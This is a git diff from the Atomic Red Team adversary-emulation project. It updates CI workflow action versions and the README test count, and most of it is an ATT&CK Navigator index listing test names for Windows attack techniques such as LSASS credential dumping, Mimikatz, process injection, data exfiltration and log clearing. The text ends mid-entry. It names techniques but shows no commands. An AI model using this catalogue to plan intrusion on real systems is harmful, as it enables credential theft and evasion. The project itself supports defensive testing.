diff --git a/.github/dependabot.yml b/.github/dependabot.yml
index 91abb11f..0c714298 100644
--- a/.github/dependabot.yml
+++ b/.github/dependabot.yml
@@ -9,3 +9,8 @@ updates:
     directory: "/" # Location of package manifests
     schedule:
       interval: "weekly"
+  # Maintain dependencies for GitHub Actions
+  - package-ecosystem: "github-actions"
+    directory: "/"
+    schedule:
+      interval: "weekly"
diff --git a/.github/workflows/assign-labels.yml b/.github/workflows/assign-labels.yml
index 1218c71f..bf4b3fc7 100644
--- a/.github/workflows/assign-labels.yml
+++ b/.github/workflows/assign-labels.yml
@@ -11,7 +11,7 @@ jobs:
     runs-on: ubuntu-latest
     steps:
       - name: download-artifact
-        uses: actions/github-script@v6
+        uses: actions/github-script@v7
         with:
           script: |
             let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({
@@ -35,7 +35,7 @@ jobs:
         run: unzip labels.zip
 
       - name: assign-labels-and-reviewers
-        uses: actions/github-script@v6
+        uses: actions/github-script@v7
         with:
           script: |
             let fs = require('fs');
diff --git a/.github/workflows/generate-counter.yml b/.github/workflows/generate-counter.yml
index 48ffa3ee..470c55d2 100644
--- a/.github/workflows/generate-counter.yml
+++ b/.github/workflows/generate-counter.yml
@@ -8,12 +8,12 @@ jobs:
   generate-counter:
     runs-on: ubuntu-latest
     steps:
-      - uses: actions/checkout@v3
+      - uses: actions/checkout@v4
         with:
           token: ${{ secrets.PROTECTED_BRANCH_PUSH_TOKEN }}
       - name: Install poetry
         run: pipx install poetry
-      - uses: actions/setup-python@v4
+      - uses: actions/setup-python@v5
         with:
           python-version: '3.11.2' 
           cache: 'poetry'
diff --git a/.github/workflows/generate-docs.yml b/.github/workflows/generate-docs.yml
index 12abe48b..929318a9 100644
--- a/.github/workflows/generate-docs.yml
+++ b/.github/workflows/generate-docs.yml
@@ -8,7 +8,7 @@ jobs:
     runs-on: ubuntu-latest
     steps:
       - name: checkout repo
-        uses: actions/checkout@v3
+        uses: actions/checkout@v4
         with:
           token: ${{ secrets.PROTECTED_BRANCH_PUSH_TOKEN }}
       - name: setup ruby
diff --git a/.github/workflows/stale.yml b/.github/workflows/stale.yml
index 0065fa55..84c7b27c 100644
--- a/.github/workflows/stale.yml
+++ b/.github/workflows/stale.yml
@@ -7,7 +7,7 @@ jobs:
   stale:
     runs-on: ubuntu-latest
     steps:
-      - uses: actions/stale@v7
+      - uses: actions/stale@v9
         with:
           stale-issue-message: 'This issue is stale because it has been open 30 days with no activity. Remove stale label or comment or this will be closed in 5 days.'
           stale-pr-message: 'This PR is stale because it has been open 45 days with no activity. Remove stale label or comment or this will be closed in 10 days.'
diff --git a/.github/workflows/validate-atomics.yml b/.github/workflows/validate-atomics.yml
index c43fd7bc..72b4d63e 100644
--- a/.github/workflows/validate-atomics.yml
+++ b/.github/workflows/validate-atomics.yml
@@ -10,11 +10,11 @@ jobs:
     runs-on: ubuntu-latest
     steps:
       - name: checkout repo
-        uses: actions/checkout@v3
+        uses: actions/checkout@v4
       - name: Install poetry
         run: pipx install poetry
       - name: setup python3.11
-        uses: actions/setup-python@v4
+        uses: actions/setup-python@v5
         id: setup-python
         with:
           python-version: "3.11.2"
@@ -30,8 +30,8 @@ jobs:
   validate-terraform:
     runs-on: ubuntu-latest
     steps:
-      - uses: actions/checkout@v3
-      - uses: hashicorp/setup-terraform@v2
+      - uses: actions/checkout@v4
+      - uses: hashicorp/setup-terraform@v3
 
       - name: Terraform fmt
         id: fmt
@@ -42,16 +42,16 @@ jobs:
     runs-on: ubuntu-latest
     steps:
       - name: checkout repo
-        uses: actions/checkout@v3
+        uses: actions/checkout@v4
       - name: Install poetry
         run: pipx install poetry
       - name: setup python3.11
-        uses: actions/setup-python@v4
+        uses: actions/setup-python@v5
         id: setup-python
         with:
           python-version: "3.11.2"
           cache: "poetry"
-      - uses: actions/github-script@v6
+      - uses: actions/github-script@v7
         id: get_pr_number
         with:
           script: |
@@ -74,7 +74,7 @@ jobs:
       - name: save labels and reviewers into a file.
         run: |
           poetry run python bin/generate_labels.py  -t  ${{ secrets.GITHUB_TOKEN }} -pr '${{steps.get_pr_number.outputs.result}}'
-      - uses: actions/upload-artifact@v3
+      - uses: actions/upload-artifact@v4
         with:
           name: labels.json
           path: pr/
\ No newline at end of file
diff --git a/README.md b/README.md
index 1569ca6f..45883a0c 100644
--- a/README.md
+++ b/README.md
@@ -2,7 +2,7 @@
 
 # Atomic Red Team
 
-![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1515-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
+![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1532-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
 
 Atomic Red Team™ is a library of tests mapped to the
 [MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
index 4a2df1cc..b5abf271 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
@@ -1 +1 @@
-{"name":"Atomic Red Team (Windows)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{"platforms":["Windows"]},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":39,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}],"comment":"\n- Gsecdump\n- Credential Dumping with NPPSpy\n- Dump svchost.exe to gather RDP credentials\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)\n- Dump Credential Manager using keymgr.dll and rundll32.exe\n"},{"techniqueID":"T1003.001","score":14,"enabled":true,"comment":"\n- Dump LSASS.exe Memory using ProcDump\n- Dump LSASS.exe Memory using comsvcs.dll\n- Dump LSASS.exe Memory using direct system calls and API unhooking\n- Dump LSASS.exe Memory using NanoDump\n- Dump LSASS.exe Memory using Windows Task Manager\n- Offline Credential Theft With Mimikatz\n- LSASS read with pypykatz\n- Dump LSASS.exe Memory using Out-Minidump.ps1\n- Create Mini Dump of LSASS.exe using ProcDump\n- Powershell Mimikatz\n- Dump LSASS with createdump.exe from .Net v5\n- Dump LSASS.exe using imported Microsoft DLLs\n- Dump LSASS.exe using lolbin rdrleakdiag.exe\n- Dump LSASS.exe Memory through Silent Process Exit\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"comment":"\n- Registry dump of SAM, creds, and secrets\n- Registry parse with pypykatz\n- esentutl.exe SAM copy\n- PowerDump Hashes and Usernames from Registry\n- dump volume shadow copy hives with certutil\n- dump volume shadow copy hives with System.IO.File\n- WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":8,"enabled":true,"comment":"\n- Create Volume Shadow Copy with vssadmin\n- Copy NTDS.dit from Volume Shadow Copy\n- Dump Active Directory Database with NTDSUtil\n- Create Volume Shadow Copy with WMI\n- Create Volume Shadow Copy remotely with WMI\n- Create Volume Shadow Copy remotely (WMI) with esentutl\n- Create Volume Shadow Copy with Powershell\n- Create Symlink to Volume Shadow Copy\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"comment":"\n- Dumping LSA Secrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"comment":"\n- Cached Credential Dump via Cmdkey\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"comment":"\n- DCSync (Active Directory)\n- Run DSInternals Get-ADReplAccount\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1005","score":1,"enabled":true,"comment":"\n- Search files of interest and save them to a single zip file (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"comment":"\n- Read volume boot sector via DOS device path (PowerShell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":2,"enabled":true,"comment":"\n- System Service Discovery\n- System Service Discovery - net.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"comment":"\n- List Process Main Windows - C# .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"comment":"\n- Query Registry\n- Query Registry with Powershell cmdlets\n- Enumerate COM Objects in Registry with Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1016","score":7,"enabled":true,"comment":"\n- System Network Configuration Discovery on Windows\n- List Windows Firewall Rules\n- System Network Configuration Discovery (TrickBot Style)\n- List Open Egress Ports\n- Adfind - Enumerate Active Directory Subnet Objects\n- Qakbot Recon\n- DNS Server Discovery Using nslookup\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":15,"enabled":true,"comment":"\n- Remote System Discovery - net\n- Remote System Discovery - net group Domain Computers\n- Remote System Discovery - nltest\n- Remote System Discovery - ping sweep\n- Remote System Discovery - arp\n- Remote System Discovery - nslookup\n- Remote System Discovery - adidnsdump\n- Adfind - Enumerate Active Directory Computer Objects\n- Adfind - Enumerate Active Directory Domain Controller Objects\n- Enumerate domain computers within Active Directory using DirectorySearcher\n- Enumerate Active Directory Computers with Get-AdComputer\n- Enumerate Active Directory Computers with ADSISearcher\n- Get-DomainController with PowerView\n- Get-WmiObject to Enumerate Domain Controllers\n- Remote System Discovery - net group Domain Controller\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":2,"enabled":true,"comment":"\n- IcedID Botnet HTTP PUT\n- Exfiltration via Encrypted FTP\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"comment":"\n- RDP to DomainController\n- Changing RDP Port to Non Standard Port via Powershell\n- Changing RDP Port to Non Standard Port via Command_Prompt\n- Disable NLA for RDP via Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"comment":"\n- Map admin share\n- Map Admin Share PowerShell\n- Copy and Execute File with PsExec\n- Execute command writing output to local Admin Share\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"comment":"\n- PowerShell Lateral Movement using MMC20\n- PowerShell Lateral Movement Using Excel Application Object\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"comment":"\n- Enable Windows Remote Management\n- Remote Code Execution with PS Credentials Using Invoke-Command\n- WinRM Access with Evil-WinRM\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}],"comment":"\n- Execute base64-encoded PowerShell\n- Execute base64-encoded PowerShell from Windows Registry\n- Execution from Compressed File\n- DLP Evasion via Sensitive Data in VBA Macro over email\n- DLP Evasion via Sensitive Data in VBA Macro over HTTP\n- Obfuscated Command in PowerShell\n- Obfuscated Command Line using special Unicode characters\n- Snake Malware Encrypted crmlog file\n- Execution from Compressed JScript File\n"},{"techniqueID":"T1027.004","score":2,"enabled":true,"comment":"\n- Compile After Delivery using csc.exe\n- Dynamic C# Compile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"comment":"\n- HTML Smuggling Remote Payload\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1027.007","score":1,"enabled":true,"comment":"\n- Dynamic API Resolution-Ninja-syscall\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.007/T1027.007.md"}]},{"techniqueID":"T1033","score":6,"enabled":true,"comment":"\n- System Owner/User Discovery\n- Find computers where user has session - Stealth mode (PowerView)\n- User Discovery With Env Vars PowerShell Script\n- GetCurrent User with PowerShell Script\n- System Discovery - SocGholish whoami\n- System Owner/User Discovery Using Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}],"comment":"\n- System File Copied to Unusual Location\n- Malware Masquerading and Execution from Zip File\n"},{"techniqueID":"T1036.003","score":8,"enabled":true,"comment":"\n- Masquerading as Windows LSASS process\n- Masquerading - cscript.exe running as notepad.exe\n- Masquerading - wscript.exe running as svchost.exe\n- Masquerading - powershell.exe running as taskhostw.exe\n- Masquerading - non-windows exe running as windows exe\n- Masquerading - windows exe running as different windows exe\n- Malicious process Masquerading as LSM.exe\n- File Extension Masquerading\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":2,"enabled":true,"comment":"\n- Creating W32Time similar named service using schtasks\n- Creating W32Time similar named service using sc\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":1,"enabled":true,"comment":"\n- Masquerade as a built-in system executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1037","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"comment":"\n- Logon Scripts\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"comment":"\n- Copy a sensitive File over Administrative share with copy\n- Copy a sensitive File over Administrative share with Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":5,"enabled":true,"comment":"\n- Packet Capture Windows Command Prompt\n- Windows Internal Packet Capture\n- Windows Internal pktmon capture\n- Windows Internal pktmon set filter\n- PowerShell Network Sniffing\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":2,"enabled":true,"comment":"\n- C2 Data Exfiltration\n- Text Based Data Exfiltration using DNS subdomains\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":7,"enabled":true,"comment":"\n- Port Scan NMap for Windows\n- Port Scan using python\n- WinPwn - spoolvulnscan\n- WinPwn - MS17-10\n- WinPwn - bluekeep\n- WinPwn - fruit\n- Port-Scanning /24 Subnet with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"comment":"\n- WMI Reconnaissance Users\n- WMI Reconnaissance Processes\n- WMI Reconnaissance Software\n- WMI Reconnaissance List Remote Services\n- WMI Execute Local Process\n- WMI Execute Remote Process\n- Create a Process using WMI Query and an Encoded Command\n- Create a Process using obfuscated Win32_Process\n- WMI Execute rundll32\n- Application uninstall using WMIC\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}],"comment":"\n- DNSExfiltration (doh)\n"},{"techniqueID":"T1048.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data HTTPS using curl windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":5,"enabled":true,"comment":"\n- Exfiltration Over Alternative Protocol - ICMP\n- Exfiltration Over Alternative Protocol - HTTP\n- Exfiltration Over Alternative Protocol - SMTP\n- MAZE FTP Upload\n- Exfiltration Over Alternative Protocol - FTP - Rclone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":3,"enabled":true,"comment":"\n- System Network Connections Discovery\n- System Network Connections Discovery with PowerShell\n- System Discovery using SharpView\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":1,"enabled":true,"comment":"\n- At.exe Scheduled task\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"comment":"\n- Scheduled Task Startup Script\n- Scheduled task Local\n- Scheduled task Remote\n- Powershell Cmdlet Scheduled Task\n- Task Scheduler via VBA\n- WMI Invoke-CimMethod Scheduled Task\n- Scheduled Task Executing Base64 Encoded Commands From Registry\n- Import XML Schedule Task with Hidden Attribute\n- PowerShell Modify A Scheduled Task\n- Scheduled Task (\"Ghost Task\") via Registry Key Manipulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1055","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}],"comment":"\n- Shellcode execution via VBA\n- Remote Process Injection in LSASS via mimikatz\n- Section View Injection\n- Dirty Vanity process Injection\n- Read-Write-Execute process Injection\n- Process Injection with Go using UuidFromStringA WinAPI\n- Process Injection with Go using EtwpCreateEtwThread WinAPI\n- Remote Process Injection with Go using RtlCreateUserThread WinAPI\n- Remote Process Injection with Go using CreateRemoteThread WinAPI\n- Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively)\n- Process Injection with Go using CreateThread WinAPI\n- Process Injection with Go using CreateThread WinAPI (Natively)\n- UUID custom process Injection\n"},{"techniqueID":"T1055.001","score":2,"enabled":true,"comment":"\n- Process Injection via mavinject.exe\n- WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"comment":"\n- Portable Executable Injection\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"comment":"\n- Thread Execution Hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":3,"enabled":true,"comment":"\n- Process Injection via C#\n- EarlyBird APC Queue Injection in Go\n- Remote Process Injection with Go using NtQueueApcThreadEx WinAPI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"comment":"\n- Process Injection via Extra Window Memory (EWM) x64 executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":4,"enabled":true,"comment":"\n- Process Hollowing using PowerShell\n- RunPE via VBA\n- Process Hollowing in Go using CreateProcessW WinAPI\n- Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"comment":"\n- Process injection ListPlanting\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":1,"enabled":true,"comment":"\n- Input Capture\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":1,"enabled":true,"comment":"\n- PowerShell - Prompt User for Password\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"comment":"\n- Hook PowerShell TLS Encrypt/Decrypt Messages\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":5,"enabled":true,"comment":"\n- Process Discovery - tasklist\n- Process Discovery - Get-Process\n- Process Discovery - get-wmiObject\n- Process Discovery - wmic process\n- Discover Specific Process - tasklist\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":33,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":22,"enabled":true,"comment":"\n- Mimikatz\n- Run BloodHound from local disk\n- Run Bloodhound from Memory using Download Cradle\n- Mimikatz - Cradlecraft PsSendKeys\n- Invoke-AppPathBypass\n- Powershell MsXml COM object - with prompt\n- Powershell XML requests\n- Powershell invoke mshta.exe download\n- Powershell Invoke-DownloadCradle\n- PowerShell Fileless Script Execution\n- NTFS Alternate Data Stream Access\n- PowerShell Session Creation and Use\n- ATHPowerShellCommandLineParameter -Command parameter variations\n- ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments\n- PowerShell Command Execution\n- PowerShell Invoke Known Malicious Cmdlets\n- PowerUp Invoke-AllChecks\n- Abuse Nslookup with DNS Records\n- SOAPHound - Dump BloodHound Data\n- SOAPHound - Build Cache\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"comment":"\n- Create and Execute Batch Script\n- Writes text to a file and displays it.\n- Suspicious Execution via Windows Command Shell\n- Simulate BlackByte Ransomware Print Bombing\n- Command Prompt read contents from CMD file and execute\n- Command prompt writing script to file then executes it\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"comment":"\n- Visual Basic script execution to gather local computer information\n- Encoded VBS code execution\n- Extract Memory via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"comment":"\n- JScript execution to gather local computer information via cscript\n- JScript execution to gather local computer information via wscript\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":5,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Local)\n- Permission Groups Discovery PowerShell (Local)\n- SharpHound3 - LocalAdmin\n- Wmic Group Discovery\n- WMIObject Group Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":14,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Domain)\n- Permission Groups Discovery PowerShell (Domain)\n- Elevated group enumeration using net group (Domain)\n- Find machines where user has local admin access (PowerView)\n- Find local admins on all machines in domain (PowerView)\n- Find Local Admins via Group Policy (PowerView)\n- Enumerate Users Not Requiring Pre Auth (ASRepRoast)\n- Adfind - Query Active Directory Groups\n- Enumerate Active Directory Groups with Get-AdGroup\n- Enumerate Active Directory Groups with ADSISearcher\n- Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)\n- Get-DomainGroupMember with PowerView\n- Get-DomainGroup with PowerView\n- Active Directory Enumeration with LDIFDE\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}],"comment":"\n- Indicator Removal using FSUtil\n- Indicator Manipulation using FSUtil\n"},{"techniqueID":"T1070.001","score":3,"enabled":true,"comment":"\n- Clear Logs\n- Delete System Logs Using Clear-EventLog\n- Clear Event Logs via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.003","score":3,"enabled":true,"comment":"\n- Prevent Powershell History Logging\n- Clear Powershell History by Deleting History File\n- Set Custom AddToHistoryHandler to Avoid History File Logging\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":6,"enabled":true,"comment":"\n- Delete a single file - Windows cmd\n- Delete an entire folder - Windows cmd\n- Delete a single file - Windows PowerShell\n- Delete an entire folder - Windows PowerShell\n- Delete Prefetch File\n- Delete TeamViewer Log Files\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"comment":"\n- Add Network Share\n- Remove Network Share\n- Remove Network Share PowerShell\n- Disable Administrative Share Creation at Startup\n- Remove Administrative Shares\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":4,"enabled":true,"comment":"\n- Windows - Modify file creation timestamp with PowerShell\n- Windows - Modify file last modified timestamp with PowerShell\n- Windows - Modify file last access timestamp with PowerShell\n- Windows - Timestomp a File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":2,"enabled":true,"comment":"\n- Copy and Delete Mailbox Data on Windows\n- Copy and Modify Mailbox Data on 